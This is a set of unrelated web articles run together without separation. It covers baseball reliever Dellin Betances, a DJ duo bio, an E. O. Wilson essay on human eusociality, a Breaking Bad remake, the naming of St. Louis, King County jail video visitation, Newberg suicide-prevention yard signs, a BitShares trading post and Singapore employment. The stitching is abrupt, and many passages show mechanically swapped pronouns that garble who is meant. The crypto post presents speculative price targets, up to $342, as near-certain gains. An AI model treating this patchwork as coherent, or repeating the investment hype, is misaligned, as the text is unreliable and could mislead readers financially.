Stay tuned to the Disney Parks Blog and Disneyland.com/Halloween for more updates on Halloween Time at Disneyland Resort and Mickey's Halloween Party, and join the conversation on Twitter with the hashtag #HalloweenTime.
Several young pitchers are making their names as relievers this season despite being a top prospect because of their potential as a starter. Even Mariano Rivera was once a starter. Zach Britton, Wade Davis, Dellin Betances, Brett Cecil, Randall Delgado; these are just some of the names that once lived on prospect lists before ultimately finding homes in the bullpen. All of those pitchers are in the top 11 for strikeout rate this year among relievers (with the exception of Britton who leads all relievers in GB%).
Dellin Betances is just one of these pitchers, but he's a fascinating case study in how one goes from top prospect to bullpen arm. Jason Collette recently wrote about Wade Davis, a former AL East starter who has excelled as an arm at the back end of Kansas City's bullpen. Their look at Davis' evolution from MLB starter to dominant reliever piqued my interest in Betances, who was once hailed as a saving grace by Yankees fans.
In 2011 Keith Law ranked Betances #73 in their top 100 prospects, mentioning that they had a very inconsistent curveball to go along with a fastball that sat in the mid 90s. The following year Law ranked them as the 83rd best prospect in all baseball. Law hinted at Betances ultimate role in their profile:
At 6-foot-8, 260 pounds, Betances is huge, throws hard and has a history of missing bats since coming back from Tommy John surgery. But there's still a strong sentiment among pro scouts that they end up in the bullpen long-term because of command questions. He'll pitch in the low 90s but runs it up to 97 mph and would likely sit 94-97, if not better, in relief. The curveball remains wildly inconsistent, with outings when they don't have it at all and outings when it looks like an above-average pitch. Keith Law - 2012 Top 100 Prospects
As an O's fan I was often subjected to listening to Yankees fans wax poetic about how the "Killer B's" were going to set the baseball world on fire upon their callups to the big league club. While Brackman fizzled and Banuelos is being stymied by continued control issues, Betances is showing promise in the relief role that Law said might be a fit for them all along. No fan wants their top rated pitching prospect to become a bullpen arm (as an O's fan I saw Johnson, Berken, Bergesen, Matusz, Arrieta, Hunter, and Britton all move from the rotation to the 'pen at one point or another), but it's often a necessity given the difficulty of developing top notch pitching talent.
Betances has made the transition from starter to reliever seamlessly, becoming one of Major League Baseball's best relief pitchers in the process.
Control issues made starting a serious hurdle for Betances. Their lack of success with a third (changeup) or fourth (sinker) pitch also limited their ability to succeed as a starter against better competition. One of the biggest hurdles for young pitching prospects is that they will need to develop a third pitch in order to succeed at the MLB level. For a starter and go through lineups multiple times, they need multiple offspeed pitches that allow them to pitch effectively to hitters from both sides of the plate. Often this comes in the form of a changeup, as most pitchers (like Betances) have a breaking ball to go along with their fastball of choice.
For relievers this is less of an issue, as exhibited by the fact that Betances has yet to throw anything other than a fastball or curve so far this season.
Betances has thrown 399 pitches so far with roughly 56% of those (225 pitches) being fastballs and the remainder (174) curves. Betances is averaging nearly 97 mph with their fastball (96.74 mph) with the curve coming in significantly slower at 83.63 mph on average.
The curveball has always been a huge asset for him, and so far this season opposing hitters have a .063 batting average against the pitch. Opposing hitters aren't slugging much better either, posting just a .104 SLG against Betances curve.
When it comes to approach, Betances basically falls into the pattern for which you'd teach a young hitter to look. When ahead they throw more curveballs, and when behind they throw more fastballs. They also haven't seemed to change their approach much at all depending on the handedness of the batter, simply daring them to hit their best stuff. The chart below breaks down the pitch usage for Betances' fastball and curveball in various situations:
The other thing that's making Betances so difficult to hit is that their control issues of the past are no longer troubling him. Throughout the upper levels of the minors Betances regularly put up walk rates above 4 or 5 per 9 innings, which makes their job that much more difficult. So far this season though Betances has upped their strikeout rate to more than 15.50 K/9 while also lowering their walk rate to just 3.33 BB/9. Granted, it's only been 24.1 IP so far, but Betances has shown that they are more willing to pound the zone as their fastball sits in the high 90s and their curve is a gnarly unhittable hammer that they routinely drop on opposing hitters.
Some are already anointing Betances as the heir-apparent to Mariano Rivera's closer role in the Bronx. While David Robertson might have something to say about that, Betances certainly has the dominant stuff we've seen from other successful closers in MLB like Craig Kimbrel or Kenley Jansen.
That right there might be the key. Betances was always an intriguing prospect, but must have had the foresight to think that they would deserve to be mentioned in the same sentence as those two ace closers. The fact is that Betances' fastball-curveball combination is among the best in the league. They may not be a starting pitcher, or the complete fulfillment of all the promise they had as a former top prospect. Instead, he's simply one of the best relief pitchers in baseball.
...
All statistics courtesy of Fangraphs, Brooks Baseball, Baseball Savant, and Baseball-Reference.
Jeff Long is a writer at Beyond The Box Score and Baltimore Sports and Life. You can follow them on Twitter at@BSLJeffLong.
About
First they woke your mind… now START TO FEEL! From Cosmic Gate's very first drumbeat through to ‘Start to Feel' - their new convention-challenging long-player - they've proved to be the perfect alliance of musical minds. A by-chance meeting in a Cologne recording studio in the late-nineties set Nic Chagall and Bossi on the course to becoming Germany's most successful and enduring electronic music duo. Their original productions have thrust them to the highest reaches of download charts & streaming lists, whilst their remixography has included everyone from scene legends like Armin van Buuren to revered Hollywood composers like James ‘Avatar' Horner.
Nic & Bossi's behind-decks-brotherhood has now created floor-frission at an uncountable number of countries. They've sold out arenas, conquered electronic music capitals, spun at a litany of major festivals and 10 years into their career became the highest climbers on DJ Mag's Top 100 chart. Driven by their critically applauded albums, club-busting singles (incl. ‘Not Enough Time', ‘Body of Conflict', The Theme, So Get Up and ‘Falling Back') and scene-defining classics ‘Be Your Sound', ‘Fire Wire' and ‘Exploration of Space', their place in electronic music's hall of fame has long since been locked.
Sometimes people tell me that I shouldn't draw comics that reference things they don't get. I think instead of complaining, they should go seek out the things I reference and then thank me for turning them onto awesome stuff that they can now enjoy.
Besides, Song of Ice and Fire is getting it's own HBO series soon. Being the greatest fantasy series this side of the Conanverse aside, now you guys really have no excuse not to be consuming it. My only regret is that Peter Steele didn't live long enough to claim their rightful place as the greatest Sandor Clegane anyone has ever seen.
Same guy playing Conan in the upcoming movie is cast as Khal Drogo, though, so that's exciting.
EDIT: Apparently I'm in the running for the Sunday Comics Deathmatch over at Kotaku. I dunno if I deserve it because admittedly the comic is only really about video games every now and then, but I'm terribly flattered nonetheless! If you guys think it belongs there, feel free to vote!
The Stone is a forum for contemporary philosophers and other thinkers on issues both timely and timeless.
The task of understanding humanity is too important and too daunting to leave to the humanities. Their many branches, from philosophy to law to history and the creative arts, have described the particularities of human nature with genius and exquisite detail, back and forth in endless permutations. But they have not explained why we possess our special nature and not some other out of a vast number of conceivable possibilities. In that sense, the humanities have not accounted for a full understanding of our species' existence.
So, just what are we? The key to the great riddle lies in the circumstance and process that created our species. The human condition is a product of history, not just the six millenniums of civilization but very much further back, across hundreds of millenniums. The whole of it, biological and cultural evolution, in seamless unity, must be explored for an answer to the mystery. When thus viewed across its entire traverse, the history of humanity also becomes the key to learning how and why our species survived.
A majority of people prefer to interpret history as the unfolding of a supernatural design, to whose author we owe obedience. But that comforting interpretation has grown less supportable as knowledge of the real world has expanded. Scientific knowledge (measured by numbers of scientists and scientific journals) in particular has been doubling every 10 to 20 years for over a century. In traditional explanations of the past, religious creation stories have been blended with the humanities to attribute meaning to our species's existence. It is time to consider what science might give to the humanities and the humanities to science in a common search for a more solidly grounded answer to the great riddle.
To begin, biologists have found that the biological origin of advanced social behavior in humans was similar to that occurring elsewhere in the animal kingdom. Using comparative studies of thousands of animal species, from insects to mammals, they have concluded that the most complex societies have arisen through eusociality — roughly, “true” social condition. The members of a eusocial group cooperatively rear the young across multiple generations. They also divide labor through the surrender by some members of at least some of their personal reproduction in a way that increases the “reproductive success” (lifetime reproduction) of other members.
Photo
Eusociality stands out as an oddity in a couple of ways. One is its extreme rarity. Out of hundreds of thousands of evolving lines of animals on the land during the past 400 million years, the condition, so far as we can determine, has arisen only about two dozen times. This is likely to be an underestimate, due to sampling error. Nevertheless, we can be certain that the number of originations was very small.
Furthermore, the known eusocial species arose very late in the history of life. It appears to have occurred not at all during the great Paleozoic diversification of insects, 350 to 250 million years before the present, during which the variety of insects approached that of today. Nor is there as yet any evidence of eusocial species during the Mesozoic Era until the appearance of the earliest termites and ants between 200 and 150 million years ago. Humans at the Homo level appeared only very recently, following tens of millions of years of evolution among the primates.
Once attained, advanced social behavior at the eusocial grade has proved a major ecological success. Of the two dozen independent lines, just two within the insects — ants and termites — globally dominate invertebrates on the land. Although they are represented by fewer than 20 thousand of the million known living insect species, ants and termites compose more than half of the world's insect body weight.
The history of eusociality raises a question: given the enormous advantage it confers, why was this advanced form of social behavior so rare and long delayed? The answer appears to be the special sequence of preliminary evolutionary changes that must occur before the final step to eusociality can be taken. In all of the eusocial species analyzed to date, the final step before eusociality is the construction of a protected nest, from which foraging trips begin and within which the young are raised to maturity. The original nest builders can be a lone female, a mated pair, or a small and weakly organized group. When this final preliminary step is attained, all that is needed to create a eusocial colony is for the parents and offspring to stay at the nest and cooperate in raising additional generations of young. Such primitive assemblages then divide easily into risk-prone foragers and risk-averse parents and nurses.
Photo
What brought one primate line to the rare level of eusociality? Paleontologists have found that the circumstances were humble. In Africa about two million years ago, one species of the primarily vegetarian australopithecine evidently shifted its diet to include a much higher reliance on meat. For a group to harvest such a high-energy, widely dispersed source of food, it did not pay to roam about as a loosely organized pack of adults and young like present-day chimpanzees and bonobos. It was more efficient to occupy a campsite (thus, the nest) and send out hunters who could bring home meat, either killed or scavenged, to share with others. In exchange, the hunters received protection of the campsite and their own young offspring kept there.
From studies of modern humans, including hunter-gatherers, whose lives tell us so much about human origins, social psychologists have deduced the mental growth that began with hunting and campsites. A premium was placed on personal relationships geared to both competition and cooperation among the members. The process was ceaselessly dynamic and demanding. It far exceeded in intensity anything similar experienced by the roaming, loosely organized bands of most animal societies. It required a memory good enough to assess the intentions of fellow members, to predict their responses, from one moment to the next; and it resulted in the ability to invent and inwardly rehearse competing scenarios of future interactions.
The social intelligence of the campsite-anchored prehumans evolved as a kind of non-stop game of chess. Today, at the terminus of this evolutionary process, our immense memory banks are smoothly activated across the past, present, and future. They allow us to evaluate the prospects and consequences variously of alliances, bonding, sexual contact, rivalries, domination, deception, loyalty and betrayal. We instinctively delight in the telling of countless stories about others as players upon the inner stage. The best of it is expressed in the creative arts, political theory, and other higher-level activities we have come to call the humanities.
The definitive part of the long creation story evidently began with the primitive Homo habilis (or a species closely related to it) two million years ago. Prior to the habilines the prehumans had been animals. Largely vegetarians, they had human-like bodies, but their cranial capacity remained chimpanzee-size, at or below 500 cubic centimeters. Starting with the habiline period the capacity grew precipitously: to 680 cubic centimeters in Homo habilis, 900 in Homo erectus, and about 1,400 in Homo sapiens. The expansion of the human brain was one of the most rapid episodes of evolution of complex organs in the history of life.
Still, to recognize the rare coming together of cooperating primates is not enough to account for the full potential of modern humans that brain capacity provides. Evolutionary biologists have searched for the grandmaster of advanced social evolution, the combination of forces and environmental circumstances that bestowed greater longevity and more successful reproduction on the possession of high social intelligence. At present there are two competing theories of the principal force. The first is kin selection: individuals favor collateral kin (relatives other than offspring) making it easier for altruism to evolve among members of the same group. Altruism in turn engenders complex social organization, and, in the one case that involves big mammals, human-level intelligence.
The second, more recently argued theory (full disclosure: I am one of the modern version's authors), the grandmaster is multilevel selection. This formulation recognizes two levels at which natural selection operates: individual selection based on competition and cooperation among members of the same group, and group selection, which arises from competition and cooperation between groups. Multilevel selection is gaining in favor among evolutionary biologists because of a recent mathematical proof that kin selection can arise only under special conditions that demonstrably do not exist, and the better fit of multilevel selection to all of the two dozen known animal cases of eusocial evolution.
The roles of both individual and group selection are indelibly stamped (to borrow a phrase from Charles Darwin) upon our social behavior. As expected, we are intensely interested in the minutiae of behavior of those around us. Gossip is a prevailing subject of conversation, everywhere from hunter-gatherer campsites to royal courts. The mind is a kaleidoscopically shifting map of others, each of whom is drawn emotionally in shades of trust, love, hatred, suspicion, admiration, envy and sociability. We are compulsively driven to create and belong to groups, variously nested, overlapping or separate, and large or small. Almost all groups compete with those of similar kind in some manner or other. We tend to think of our own as superior, and we find our identity within them.
Related More From The Stone Read previous contributions to this series.
The existence of competition and conflict, the latter often violent, has been a hallmark of societies as far back as archaeological evidence is able to offer. These and other traits we call human nature are so deeply resident in our emotions and habits of thought as to seem just part of some greater nature, like the air we all breathe, and the molecular machinery that drives all life. But they are not. Instead, they are among the idiosyncratic hereditary traits that define our species.
The major features of the biological origins of our species are coming into focus, and with this clarification the potential of a more fruitful contact between science and the humanities. The convergence between these two great branches of learning will matter hugely when enough people have thought it through. On the science side, genetics, the brain sciences, evolutionary biology, and paleontology will be seen in a different light. Students will be taught prehistory as well as conventional history, the whole presented as the living world's greatest epic.
We will also, I believe, take a more serious look at our place in nature. Exalted we are indeed, risen to be the mind of the biosphere without a doubt, our spirits capable of awe and ever more breathtaking leaps of imagination. But we are still part of earth's fauna and flora. We are bound to it by emotion, physiology, and not least, deep history. It is dangerous to think of this planet as a way station to a better world, or continue to convert it into a literal, human-engineered spaceship. Contrary to general opinion, demons and gods do not vie for our allegiance. We are self-made, independent, alone and fragile. Self-understanding is what counts for long-term survival, both for individuals and for the species.
Edward O. Wilson is a Honorary Curator in Entomology and University Research Professor Emeritus, Harvard University. They have received more than 100 awards for their research and writing, including the U. S. National Medal of Science, the Crafoord Prize and two Pulitzer Prizes in non-fiction. Their most recent book is “The Social Conquest of Earth.”
We've known since May that Breaking Bad would find a new life in Latin America, much as Walter White did in the surprise, post-credits epilogue that your DVR cut off from Sunday's finale. (Call your cable provider and complain until they agree to air it!) Now we have our first look at Metastasis, the Colombia-set remake that's set to air through Univision in America, and translate Breaking Bad into Spanish as faithfully and accurately as a high-school first-year student who's just trying to get through their workbook here.
For starters, meet the new Walter White—or as he's known to both native Spanish-speakers and the people making obvious jokes that nevertheless prove true, “Walter Blanco.” He's also a cancer-stricken chemistry teacher who turns to cooking methamphetamine to support their family. They also wear tighty-whities (or, as they're known in Colombia, “tighty blancos”).
Advertisement
Now meet the rest of the ensemble, whose names, occupations, and baldness have all been recreated with a little extra Latin American flavor. For instance, “Henry” likes flashy vests and necklaces. “Cielo” (from the Spanish word for “sky”) earns a spicier form of misogynistic ire. “Jose” still wears hoodies, because he's a criminal.
Advertisement
However, there will be one, slightly bigger difference, besides the fact that Walter is cooking meth in Colombia and somehow this deserves special attention: “Motor homes are not popular in Colombia,” says Angelica Guerra, Sony's managing director of production for Latin America, “so audiences will see Walter and Jose cooking up their first several batches of methamphetamine in an old, barely drivable school bus.” Because in Colombia, apparently no one would think twice about setting up a meth lab inside a big, yellow bus that's covered in windows, but using one of those unpopular RVs would strain credibility.
[via Buzzfeed, The Hollywood Reporter]
× Expand La Salle claims Louisiana for France.
The bronze statue in front of the museum says it all: Saint Louis, Louis IX, (1214-1270) the Crusader King on their mighty steed. Of course our city was named for him, to honor their future namesake Louis XV, King of France in 1764, year of our city's founding. Everyone knows this. Or we're supposed to. Auguste Chouteau, who was there—and ought to know—told us so.
Or, perhaps we're named for the river named after Saint Louis in honor of Louis XIV, the flamboyant Sun King, who ruled a century earlier.
It's confusing, keeping all these Louises straight. The problem begins in the late 1600s. René-Robert Cavelier, Sieur de La Salle, was a seminary dropout who explored the Pays des Illinois, or French Illinois country. No one quite knows the extent of all their travels, but we do know they made an epic trip to the mouth of the Mississippi, near present-day New Orleans, in 1682. There, they proclaimed
In the name of the most high, mighty invincible and victorious Prince, Louis the Great, by the Grace of God and King of France and of Navarre, Fourteenth of that name…[I take possession of] this country of Louisiana…from the mouth of the great River St. Louis, on the eastern side…
River St. Louis? Say again? Encore? La Salle was apparently referring to the Ohio River, whose upper reaches they may have explored the previous decade. The name was short-lived and the Ohio was renamed La Belle Riviere. Missionary explorer Jacques Marquette had proposed calling the Mississippi River Conception, after the Virgin Mary. Muddying the holy waters, La Salle dubs it “River Colbert,” after an influential advisor to the Roi du Soleil. Alas, to the disappointment of a future late-night talk show host, this label didn't stick either.
Finally the names sorted themselves out. The Mississippi's new identity: Fleùve Ste. Louis. The Saint Louis River. Denis Diderot's famous Encyclopédie explains
The Mississippi, otherwise called by the French, the Saint Louis River, river in North America, the most considerable part in Louisiana, which is crosses from one side to the other up until its outlet into the sea.
The Encyclopédie's entry date is 1765, a year after St. Louis's founding. Coincidence? Maybe. But even early 18th century maps clearly show Fleùve Ste. Louis, or la Riviere de S. Louis, often close to the site of the future city. One 1718 map says, “Mississippi, today (“aujourd'hui”) the St. Louis River,” and “now (“apresent”) the St. Louis River,” sounding suspiciously like an 18th century geopolitical rebranding campaign. The nametag says it all: it's our river, folks, don't mess with the St. Louis. The French were touchy about their holdings in the heartland, which at the time consisted of a few villages and fur trading forts. But they made great maps.
× Expand 1755 map showing the “Fleùve S. Louis” (Mississippi) river, upstream from site of present-day city of St. Louis.
Three centuries later, we can't help but wonder how things might have turned out had the name stayed. Roll on St. Louis? Life on the St. Louis? St. Louis Mud Pie? Hmm. It's not doing anything for me.
Fortunately, things didn't get that far. Eighty-two years after La Salle's historic descent, Pierre Laclède made their 12-week voyage up Fleùve St. Louis from New Orleans and gave the town the river's name. The land they were standing on was now claimed by Spain, from a secret treaty two years earlier, but luckily Laclède didn't know it. (San Luis?) The river soon reverted to its rightful Ojibwe or Algonquin title, "Misi-ziibi," meaning "Great River," which had never been completely abandoned, even by the French. The town kept its name. And whose name is it? Ultimately, a 13th century canonized king, via two other possible kings honored by their royal explorers. And a long and fabled river, whose name had once echoed the city next to it.
Further study:
Eccles, W. J., The French in North America 1500-1783
Ekberg, Carl, St. Louis Rising: The French Regime of Louis St. Ange de Bellerive
Fausz, J. Frederick, Founding St. Louis, First City of the New West
Parkman, Francis, France and England in North America: Vol. 1: Pioneers of France in the New World, The Jesuits in North America in the Seventeenth Century, La Salle and the Discovery of the Great West
David Rumsey Maps
Research Laboratories of Archaeology: Early Maps of the American Midwest and Great Lakes
Roger Kaza is principal horn of the St. Louis (River) Symphony and an amateur historian of the French-Canadian fur trade.
Originally published June 17, 2014 at 7:44 PM | Page modified June 18, 2014 at 4:16 PM
Corrected version
King County is installing a video visitation system for inmates inside the two King County jails. Online visits are expected to begin by the end of the summer at the county's downtown Seattle jail and its Maleng Regional Justice Center in Kent.
Five months pregnant and feeling it, Cierra Rice settled in for a long wait to visit their boyfriend in the King County Jail.
Rice hired a sitter to care for their 18-month-old son and had taken two bus transfers from their home in Renton to get to the downtown Seattle jail. When they arrived they were told the visitation rooms were full and they would have to wait.
Despite the hardship, Rice said face-to-face contact with Jasaan Dowell, who is in jail on drug charges, is important. They don't bring their son because they get fidgety in the concrete and glass visitation kiosk, and they don't understand why they can't hug their dad.
“Visiting through the glass is way more personal, but if I couldn't be here I'd love it,” Rice said about the possibility of visiting via video.
Rice and the thousands of others who visit jail inmates in Seattle and Kent each year will soon get their wish.
Securus Technologies of Dallas will pay $1 million to install a video visitation system for inmates inside the two King County jails, allowing those on the outside to visit with inmates online. Some of the systems are expected to be in place by the end of the summer, Interim Jail Director William Hayes said.
Securus will recoup the installation cost through system revenues during the first year it is in use, according to the county.
Hayes said the system is fairly simple to use: People outside the jail who are approved for visitations will receive free software from a telecommunications company that they can download on a home computer. That person can book a visitation appointment online and call the jail from the software-equipped computer.
“It's similar to Skype, but it's a more secure system,” Hayes said.
At the other end, inmates then will be able to visit online while seated in a visitation booth. The computers they will use will be specially reinforced screens, strong enough to handle a potentially irate inmate, Hayes said. The virtual visits will be scheduled in 25-minute blocks.
Each week, every inmate will be allowed one free 25-minute video call. Each additional video call will cost $12.95, Hayes said. They said the cost is reasonable, noting that some inmate video calls elsewhere can cost as much as $24.95.
As with telephone calls placed from the jail, video visits will be recorded and held for “investigative purposes” for 60 days after the call, jail staff members said. Face-to- face visitations are not recorded.
Video visits between inmates and their lawyers, mental-health experts or other “professional visits” will not be recorded, Hayes added.
Though the jail will still offer in-person visits, Hayes said, they eventually may be phased out.
Video visitations will save the county money by eliminating the extra staffing required for in-person visits.
As of earlier this month, there were more than 1,900 men and women housed in the two King County adult jails; about half of all inmates have in-person visits, Hayes said.
“We've had fights in the lobby,” Hayes said, recalling several times that an inmate's wife and girlfriend both showed up for a visit.
They said video calls will make it easier for visitors who live outside King County to have a conversation with their loved ones.
Eventually, Hayes said, they hope to allow inmates and their loved ones to visit on smartphones, laptops, tablets and other mobile devices.
“You've got to maintain that family connection with families and friends,” said Hayes, who noted that inmates who maintain strong family ties are less likely to reoffend.
Video visitations have become common in jails and prisons across the nation. The state Department of Corrections allows for video visits; and SCORE, King County's misdemeanor jail in Des Moines, already allows inmates to make video visits.
Video visitations will eventually be phased in at the King County Youth Services Center, the juvenile jail.
Peter Wagner, executive director of Prison Policy Initiative, a Massachusetts-based research group that focuses on ending mass incarceration, said video visitations are being established at more and more corrections institutions and should be subject to oversight.
“Video visitation is here. It is not from the future, it is not from ‘The Jetsons,' ” said Wagner, referring to the cartoon about a futuristic family. “Most jails have this or are actively looking at it.”
Wagner said video visitations are not regulated by the Federal Communications Commission, but that's something the Prison Policy Initiative wants changed.
They said inmates and their families have long been the target of predatory behavior by prisons, jails and technology companies that charge exorbitant rates for phone calls.
Last year, the Congressional Black Caucus pressed the FCC to cut the costs that inmates and their families pay for phone calls, which it said can be nearly $4 per call, with up to an additional 55 cents a minute for long-distance calls.
The caucus noted the high phone rates disproportionately impact African Americans and Hispanics who make up more than 60 percent of the incarcerated, according to The Associated Press.
In February, the FCC started regulating inmate telephone rates in an effort to end price-gouging.
The prison phone market, which brings in $1.2 billion annually, is dominated by two little-known phone companies: Global Tel-Link, based in Atlanta, and Securus Technologies, according to a story that ran in the Los Angeles Times last year.
King County Jail inmate Francisco Hayward, 29, of Seattle, said they would prefer online visits.
“It'd be awesome. These rooms [the visitation kiosks] get crowded and visitations get cut off because of overcrowding,” said Hayward, who is in jail for investigation of assault and violation of a no-contact order. “It would be easier for friends and family.”
But Kibby Thomas, of Federal Way, said that even if video visits were offered, they would still travel to the Maleng Regional Justice Center in Kent every week to see their boyfriend. They think the video visits will be “mechanical.”
The face-to-face visits are “one step closer to being touched,” they said in the lobby of the Kent jail on a recent afternoon, accompanied by their son Elia Rodriguez, 2, and daughter 6-year-old Ezette Fernandez.
“I think they realized a long time ago that being able to see their kids is important.”
Jennifer Sullivan: 206-464-8294 or jensullivan@seattletimes.com. On Twitter @SeattleSullivan.
Information in this article, originally published June 17, 2014, was corrected June 18, 2014. A previous version of this story incorrectly stated that King County would pay for the $1 million video visitation system. Securus Technologies of Dallas will pay for the installation costs and will recoup that amount in revenue generated by the system.
Four weeks for 99 cents of unlimited digital access to The Seattle Times. Try it now!
'Don't Give Up' signs catching on in Newberg
Newberg woman's yard signs with encouraging phrases a reaction to growing suicide trend locally
(Editor's note: This is the fourth in a long-term series of stories)
If you've driven around, taken your bike for a ride or gone for a long walk through Newberg over the past three weeks or so, you've likely encountered phrases like "Don't Give Up," "Your Mistakes Don't Define You" or "You Are Worthy of Love."
There is nothing else on simple black-and-white yard signs that have popped up on lawns across Newberg — no name, website address or phone number — because the messages are meant to speak for themselves and nothing more.
They're simply words of encouragement put out into the world just in case someone might need them.
They're out there because when Newberg resident Amy Wolff learned from local teachers that youth in area have been attempting and committing suicide at an alarming rate, they couldn't just do nothing.
With their husband and two young daughters, Wolff put out 20 signs around town and within days, a buzz developed on local Facebook pages and they were identified as the driving force.
A torrent of requests for signs followed and, with some help from a local graphic designer, it wasn't long before Wolff established a website (www.dontgive upsigns.com) in order to sell them at cost and meet the demand.
Signs have already been delivered to places as far away as California and Montana and, as of Monday, the total number of signs ordered hit 500.
"I had no idea how perfect so many pieces were, why it worked so well," Wolff said. "I really couldn't have planned it. It just happened."
"You don't do just anything," was actually the phrase that crossed Wolff's mind after having a conversation with friends in their reading group about recent suicides and suicide attempts.
It comes from the controversial Netflix show "13 Reasons Why" about a high school student who commits suicide, but Wolff immediately connected it with an idea they had been mulling over for a couple of years.
They were first inspired to post some kind of affirmative yard sign after reading "Love Does" by Bob Goff, which extols making extravagant acts of love to others, even strangers, as a reflection of God's love. Around the same time, they also read "The Gifts of Imperfection" by Brene Brown, but it wasn't until a few weeks ago, however, that they felt compelled to act.
"I thought now is the time," Wolff said. "The message is for everyone."
Wolff reached out on Facebook for help with lowering their printing costs and local business owner Jessica Brittell, who owns the Velour clothing store in Newberg and does graphic design work on the side, responded and was quickly on board after learning about Wolff's idea.
"She's been amazing," Wolff said. "She was the enabler. I had a dream and she's the one who said I could make it happen."
While Wolff felt called to act because of suicide in the community, Wolff said they are applicable and seem to have resonated with a wide group of people for a variety of reasons.
For their personally, "Don't Give Up" is what they heard from friends when they were struggling in their marriage and they say "Your Mistakes Don't Define You" seems to have hit a chord with a lot of people.
"Don't give up is kind of cliché, but at the same time there is a lot of weight and it can mean different things to so many different people," Brittell added.
Wolf also witnessed the drowning of their older brother when they were 14 years old and says empathy has been a big part of their life ever since.
"I very quickly had to discern what's life really about and people had the best intentions, but said the worst things," Wolff said. "People just don't know what to do with grief."
Most of the feedback about the signs has come via Facebook or the website, but Wolff and Brittell have also launched an Instagram page (dontgiveupsigns). One of their early Facebook posts about the idea received more than 1,500 likes and 600 shares.
"Some Newberg families who have lost members recently to suicide have said they just want to be a part of something that spreads hope and gave money," Wolff said. "That was super meaningful."
Wolff also felt immediately supported when they began knocking on doors and asking permission to post those first 20 signs.
"I wasn't sure how people would react and people were so quick when they heard it was not a company, not an organization, not a church," Wolff said. "There are zero strings attached to this. It was just a young family. I think part of the reason it exploded was that there was a lot of trust and no skepticism."
The pair added stickers and car decals to the site last week, then handed out more than 200 stickers and 400 cards at the Saturday Portland Market. Signs with new phrases like "You Matter" and "You Are Not Alone" have also been added to the site.
They and Brittell considered starting a nonprofit to help with the logistical aspects of the project, but ultimately decided that it felt more like a movement.
"The influence and fruit could be much more broad and wide because I've chosen not to own it," Wolff said. "People can copy it all they want. I just want people to be encouraged."
At the same time, they understand that people are placing a lot of trust in her, as people and organizations have made some significant donations, so they want to be as responsible and transparent as possible.
Several organizations, including the Newberg School District, the county and George Fox University have been working together in an effort to better connect people who are struggling with mental health issues and suicide ideation to the services that can help them.
Part of that effort has been to foster a frank and open discussion about suicide and Wolff likes that their idea, even if the impact is small, can be considered part of a wider response by the community.
"I think there is power in numbers and that 20 signs is great, but 350 is more," Wolff said. "One voice is great, but a whole community of voices together is better. So to be contributing somehow, in some little part, feels right."
One message Wolff received, from a mother who drove by one of the signs with their daughter in the car, hammered that point home for them The mother relayed to them that seeing the sign led to a conversation about why the message on the sign matters.
"If this can open it up and make people talk about hard, messy things, the less shame we feel, the less secrecy we are, the more alert we are, just all good things," Wolff said.
SUMMARY
Here is my darling Bitshares (BTS) putting in such a beautiful a,b,c,d,e triangle. For this to remain correct, the d and e waves need to be completed. Often, patterns morph. When you at first forward discern an ascending right triangle, that could easily morph into an a,b,c,d,e triangle. The nay sayers will say the forecast was wrong and so pack your bags and go home. No! Only the idiots and the innocents think that way. NOT my blog followers! Should the a,b,c,d,e complete, I expect $0.91 and then $1.06 which represents about a 100% profit potential!! The earlier targets of $0.11, 0.21 and 0.42 have been filled. Note the Fractals!! The first triangle of a,b,c,d,e rocketed prices from $0.19 to $0.68. The current, larger fractal should bring prices $1 above the $0.58 which is where the apex resides. The second fractal is at least twic as large so 2x of travel UP is expected. I remain on record that the long term target for BitShares is $342 or HIGHER. So, BTS current prices are clearly at an infancy.
The below chart is the BTS/BTC pair. With the recent decline of Bitcoin (BTC), it has had a breakout to complete what looks like wave 1 up. Once wave 2 corrects, price should make orgasmic lunges upwards towards 10,431 and 12,289 Satoshi. Recall, that I've said there are two ways a /BTC pair could rise. The first is if BTC falls and second, the demand for /BTC pair exceeds the rise of BTC. I believe the latter will be what causes the BTS/BTC to rocket up! Look at the HUGE Cup & Handle potential!!
Please consider reviewing these Tutorials on:
Elliott Wave Counting Tutorial #1
Elliott Wave Counting Tutorial #2
Elliott Wave Counting Tutorial #3
Laddering and Buy/Sell Setups.
Laddering Example with EOS
Tutorial on the use of Fibonacci & Elliott Waves
These Technical Analysis Books: Elliott Wave Priniciple & Technical Analysis of Stock Trends are highly recommended
@haejin's Trading Nuggets
Essay: Is Technical Analysis a Quantum Event?
Follow me on Twitter for Real Time Alerts!!
--
Singapore's reliance on foreign labor may be shifting, with the city-state's central bank pointing on Thursday to a cautious employment outlook.
In its macroeconomic review, conducted twice yearly, the Monetary Authority of Singapore said it expected net employment growth was expected to stay "modest and uneven across sectors."
That comes as the MAS forecast Singapore's economy would grow by 1-3 percent this year, not much off the 2 percent growth in 2016, boosted by the IT-related segments, amid new mobile-phone product launches and increasing use of semiconductors.
It noted that in the second half of last year, resident net employment rose by around 11,400, but foreign headcount declined by around 11,700, leaving overall unemployment largely unchanged.
Still, around 31,000 permanent residencies were granted in 2016, according to a March speech by Josephine Teo, senior minister of state for the Prime Minister's Office. Permanent residents would be considered residents, not foreign workers.
Most of the job losses were low-skilled work permit holders, the MAS said, noting the job losses were concentrated in the manufacturing and construction sectors, which had been restructuring.
Overall foreign employment contracted by 2,500, excluding foreign domestic workers, the first contraction since 2009, during the global financial crisis, the MAS said.
"At the same time, an increase in net entrants to the local labour force in the last quarter contributed to a slightly higher resident unemployment rate," it said.
The MAS noted that in the fourth quarter of last year the unemployment rate rose by 0.2 percentage point to 3.1 percent.
Bringing foreign workers into Singapore can be contentious politically.
After the 2011 election, in which the ruling party saw its margin of victory slip, the government responded to public opposition to the country's liberal immigration policies by making it more difficult for companies to bring in foreign workers. Measures included raising minimum salaries to make it more attractive to hire locally as well as pushing for greater skill training for foreign workers and changing the allowable foreign-to-local ratios in some industries.
The central bank expected employment growth would remain modest and uneven.
"It is likely to be stronger in the community, social and personal segment, supported by manpower requirements in education and healthcare, but weaker in sectors such as manufacturing and construction," the MAS said.
"The soft labor market will also cap underlying wage pressures in the economy."
At the same time, some occupations, such as nurses, physicians and restaurant managers, were seeing vacancies, sometimes for longer than six months.
—By CNBC.Com's Leslie Shaffer; Follow them on Twitter @LeslieShaffer1
Follow CNBC International on Twitter and Facebook.
